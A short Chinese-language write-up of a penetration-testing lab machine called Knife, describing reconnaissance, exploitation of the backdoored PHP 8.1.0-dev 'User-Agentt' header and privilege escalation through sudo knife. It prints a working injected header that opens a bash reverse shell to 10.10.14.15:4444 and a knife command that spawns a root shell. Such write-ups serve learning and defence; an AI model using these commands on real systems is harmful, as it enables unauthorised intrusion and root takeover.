Knife 靶机渗透

目标：得到root权限,取得user.txt,root.txt
作者：shadow
时间：2021-07-23

请注意：我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的，如果列出的技术用于其他任何目标，概不负责。

一、信息收集

Nikto查看漏洞，发现php版本8.1.0

查找是否有已知漏洞exploit

PHP 8.1.0-dev 版本在2021年3月28日被植入后门，但是后门很快被发现并清除。当服务器存在该后门时，攻击者可以通过发送User-Agentt头来执行任意代码。

Burpsuit抓包，尝试漏洞

发现漏洞可用，直接反弹shell

User-Agentt:zerodiumsystem("bash -c 'exec bash -i >& /dev/tcp/10.10.14.15/4444 0>&1' ");

取得user.txt

二、提权

Sudo -l

Knife有root权限，sudo /usr/bin/knife查看怎么用

???????

sudo knife exec --exec "exec '/bin/sh -i' "

三、总结

无